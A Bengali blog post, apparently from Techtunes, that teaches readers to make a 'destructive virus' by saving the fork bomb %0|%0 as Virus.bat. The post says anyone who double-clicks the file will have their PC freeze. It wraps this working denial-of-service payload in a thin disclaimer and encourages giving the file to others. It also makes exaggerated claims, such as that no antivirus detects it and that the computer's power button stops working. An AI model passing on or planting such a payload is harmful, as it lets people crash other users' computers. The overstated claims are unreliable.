Quantcast
ADs by Techtunes tAds
ADs by Techtunes tAds

ধ্বংসাত্মক একটি ভাইরাস তৈরী করে, যেকোন পিসি কে অভ্যন্তরীন ভাবে বিপর্যস্ত করে তোলার পিসি ট্রিকস্‌।

আজকে, আপনাদের কে এমন এক ধ্বংসাত্মক ভাইরাস তৈরী করার, ট্রিকস্‌ শেখাব যার সাহায্যে আপনি যেকোন পিসি কে, অভ্যন্তরীন ভাবে সম্পূর্ণ বিপর্যস্ত করে দিয়ে পঙ্গু করে তুলতে পারবেন। তবে দয়া করে এই ট্রিকস্‌ টির সাহায্যে কারোর ক্ষতি করবেন না। আপনার যদি কারোর কোন ক্ষতি করার মনোভাব থাকে তবে, এই টিউন থেকে দূরে থাকুন। কারণ এই ট্রিকস্‌ টি, যেকোন পিসির পক্ষে সত্যই খুব ক্ষতিকর।

ADs by Techtunes tAds

এই ভাইরাস তৈরী করার ট্রিকস্‌ টি আপনাদের শেখাচ্ছি তার কারণ হলো আপনি ভবিষ্যতে যাতে এই ধরনের বিপদে না পড়েন। চলুন শুরু করা যাক।

স্টেপ ১ - আপনি প্রথমে আপনার পিসি থেকে নোটপ্যাড  চালু করুন।

স্টেপ ২ - নোটপ্যাডে এই কোডটি লিখুন। কোড - (%0|%0)

স্টেপ ৩ - এরপর সেভ অপশনে গিয়ে, ফাইলের নাম Virus.bat লিখে সেভ করুন।

স্টেপ ৪ – ব্যাস তৈরী হয়ে গেলো আপনার ধ্বংসাত্মক ভাইরাস।

ADs by Techtunes tAds

এই বার এই ফাইলের উপর ডবল ক্লিক করলেই গোটা পিসি হ্যাং হয়ে যাবে। কি বোর্ড এর কোন কী, বা মাউস কাজ করবে না। এক কথায় পিসি অভ্যন্তরীন ভাবে সম্পূর্ণ, বিপর্যস্ত হয়ে পড়বে এই অবস্থাকে পিসির পঙ্গুত্বও বলতে পারেন। যে ব্যক্তি তার পিসি তে একবার আপনার তৈরী করা Virus.bat ফাইলটি ভুল করেও ডবল ক্লিক করে খুলে ফেলবে তার আর দুর্দশার সীমা পরিসীমা থাকবেনা। আরও দুঃখের কথা হলো, যে পিসি তে এই Virus.bat ফাইল টি খোলা হলে সেই পিসির সিপিউ-এর বটন ও আর কাজ করবে না।

আর একটি গুরুত্বপূর্ণ কথা হলো যে এই ভাইরাসটিকে ডিটেক্ট করবে এমন কোন অ্যান্টিভাইরাস এখনো তৈরী হয়নি। আশা করি, আপনি এই টিউনটি পড়ার পর এই ভাইরাস যে কিরকম ধ্বংসাত্মক এবং মারাত্মক তা আপনি বুঝতে পেরেছেন। ভুল করেও নিজের পিসি তে ভাইরাসটি ওপেন করবেন না তাহলে, কিন্তু আপনারও দুর্দশার সীমা পরিসীমা থাকবেনা। এই টিউনটি পূর্বে প্রকাশিত হয়েছে সহজ পাঠ ব্লগে। https://sahojpath.blogspot.in/2017/07/make-harmful-pc-virus.html

ADs by Techtunes tAds
Level 0

আমি নীলাঞ্জন মুখার্জী। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 1 বছর 5 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 24 টি টিউন ও 24 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 5 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

প্রিয় নীলাঞ্জন মুখার্জী,আমি টেকটিউনস কমিউনিটি ম্যানেজার, শোয়াইব,টেকটিউনস থেকে আপনার সাথে অফিসিয়ালি যোগাযোগ করতে চাচ্ছি। টেকটিউনস থেকে আপনার সাথে অফিসিয়ালি যোগাযোগ করার জন্য http://techtun.es/2obSQxE লিংকটিতে ক্লিক করে আপনার সাথে যোগাযোগের প্রয়োজনীয় তথ্য সাবমিট করে আমাদের সাহায্য করবেন আশা করছি।ছদ্ম ছবি, নাম, ইমেইল, ফোন, ঠিকানা ও সৌশল Contact পরিহার করে আপনার প্রকৃত/আসল ছবি, নাম, ইমেইল, ফোন, ঠিকানা ও সৌশল Contact দিন। যেহেতু টেকটিউনস থেকে আপনার সাথে অফিসিয়ালি যোগাযোগ করা হবে।সাবমিট করার পর আমাদের এই ম্যাসেজের রিপ্লাই আপনার কাছ থেকে আশা করছি।বিশেষ নোট: আপনি যদি পূর্বে আমাদের এই ম্যাসেজ পেয়ে ফর্মটি সাবমিট করে থাকেন তবে আর পুনরায় সাবমিট করার প্রয়োজন নেই। কিন্তু যদি আপনি এখনও আমাদের এই ফর্মটি পেয়ে সাবমিট করে না থাকেন তবে অবশ্যই এখনই সাবমিট করুন এবং সাবমিট করার পর অবশ্যই আমাদের এই ম্যাসেজের রিপ্লাই দিন।ধন্যবাদ আপনাকে।